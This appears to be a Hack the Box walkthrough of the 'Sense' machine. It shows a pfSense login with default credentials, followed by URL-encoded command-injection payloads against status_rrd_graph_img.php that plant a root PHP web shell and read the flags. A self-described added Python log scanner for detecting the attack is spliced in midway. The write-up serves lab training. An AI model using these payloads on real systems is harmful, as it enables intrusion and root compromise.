HTB: “Sense” Walkthrough

Andrew Hilton
4 min read · Jul 28, 2019


We’re back again for another Hack the Box retired machine walkthrough; this time we’re going to be doing Sense.

OK, so first things first, let’s scan the box with nmap and see what ports we have open.

Starting Nmap 7.60 ( https://nmap.org ) at 2017–11–05 12:22 GMT
Nmap scan report for 10.10.10.60
Host is up (0.024s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https

So after running a dirbuster scan, I found a system-users.txt file:

####Support ticket###
Please create the following user
username: Rohit
password: company defaults

Cool, and after hitting it with a dirsearch scan I found a changelog.txt:

# Security Changelog
### Issue
There was a failure in updating the firewall. Manual patching is therefore required.

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window.

So let’s do a quick Google search for the pfSense default creds:

Open a web browser and navigate to https://192.168.1.1/, using the default username admin and password pfsense to login.

Trying the default credentials didn’t work, but remember that support ticket we saw earlier asking for the user Rohit to be created with the “company defaults”. We can use rohit and the password pfsense at the login page.

Awesome and we’re in.

So after looking around and not really finding anything of use that might be the next step we’re looking for, I think we should head over to Google and see what we can find!

https://www.proteansec.com/linux/pfsense-vulnerabilities-part-2-command-injection/

After reading through the blog post and trying the suggested vuln points, I came across one that seems to have worked.

status_rrd_graph_img.php

So, switching to Burp, we can carry on with the blog post: the database parameter of this script is passed to a shell command, so appending our own commands to it should allow us to create and read a file on the box.

GET /status_rrd_graph_img.php?database=queues;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;echo+"CMD+INJECT">cmd.txt HTTP/1.1
Host: 10.10.10.60
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: cookie_test=1509963770; PHPSESSID=82378227b84a931c638f73c4481214c8
Connection: Keep-Alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Then browsing to the /cmd.txt file in the browser gives me this.

Perfect, so we can see I have created a file on the box and can read its contents. Now let’s try using this more productively and get a shell out of it somehow!

After trying to get a shell uploaded and failing, I realised I didn’t actually need to have a shell on the box; we could do all we need with just the web shell, sending commands in one at a time. It’s not elegant, but it will get the job done.

queues;cd+..;cd+..;cd+..;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;echo+%22%3C?php%20system(%27whoami%27);?%3E%22%3Eandrew.php
(All the payloads are going through Burp and being URL-encoded, so they look a little weird; if you want to see them decoded, just paste them here.)
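As an added example (my own code, not part of the original walkthrough or of pfSense), here is a small defender-side check for the pattern used above: it pulls the request out of each web server log line, decodes the `database` parameter of requests to status_rrd_graph_img.php, and flags any value containing shell metacharacters. The log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample log lines (combined log format). The first two carry a
# database value with shell metacharacters, as in the requests above; the
# last two are benign pfSense traffic.
SAMPLE_LOG = """\
10.10.14.5 - - [05/Nov/2017:12:30:01 +0000] "GET /status_rrd_graph_img.php?database=queues;cd+..;cd+usr;cd+local;cd+www;echo+%22test%22%3Ecmd.txt HTTP/1.1" 200 512
10.10.14.5 - - [05/Nov/2017:12:31:09 +0000] "GET /status_rrd_graph_img.php?database=queues%3Bid HTTP/1.1" 200 512
10.10.14.7 - - [05/Nov/2017:12:32:45 +0000] "GET /status_rrd_graph_img.php?database=queues&graph=queues HTTP/1.1" 200 4096
10.10.14.7 - - [05/Nov/2017:12:33:02 +0000] "GET /index.php HTTP/1.1" 200 8192
"""

TARGET_SCRIPT = "/status_rrd_graph_img.php"
# Characters that let the value escape the intended rrdtool argument and
# chain further shell commands or redirect output.
SHELL_META = re.compile(r"[;&|`$<>\n]")
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def parse_query(query):
    """Split on '&' only (a ';' inside a value is what we want to inspect),
    then percent-decode keys and values."""
    params = {}
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def suspicious_database_values(request_target):
    """Return decoded 'database' values that contain shell metacharacters."""
    url = urlsplit(request_target)
    if url.path != TARGET_SCRIPT:
        return []
    values = parse_query(url.query).get("database", [])
    return [v for v in values if SHELL_META.search(v)]

def scan_log(text):
    """Return (client_ip, decoded_value) for every suspicious request line."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if match:
            for value in suspicious_database_values(match.group("target")):
                hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in scan_log(SAMPLE_LOG):
        print(f"{ip}: {value!r}")
```

The same check applied at the input-validation layer (rejecting any database name that is not a plain identifier before it reaches the shell) is the fix the changelog on the box says is still outstanding.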

Sending the above command, we can see the web shell is actually running as root. Well, this box just got a lot easier :)

We should be able to inject some other commands to browse the file system and read both the user.txt and root.txt files. Let’s do it!

queues;cd+..;cd+..;cd+..;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;echo+%22%3C?php%20system(%27cat%20root/root.txt%27);?%3E%22%3Eandrew.php

If we then navigate to the andrew.php page in the browser, we can see the root flag.

root
d08c32a4d7k8c8b27e76eb51a69f1a86

We can send the same command again, but tweaked to read rohit’s user.txt flag:

user
8721327cc230937b40d27n0s17e7348b

I really liked this box. It was a little frustrating having to send the commands in one at a time, but it was a good exercise in using Burp to query the server instead of the usual path for these “easy” boxes that keep you in the browser/web shell, etc.

Huge thanks to lkys37en for creating the box and to HTB for hosting it and for running such an amazing platform.

If you found this article helpful, please give it some 👏 and share it with anyone who you think might find it helpful too! + Feedback and coffees are always welcome! 😄

Take care and hopefully I’ll see you back here soon for more content and walkthroughs.


Andrew Hilton

Tactical Threat Manager @ FinTech | Purple Team | Offensive Operations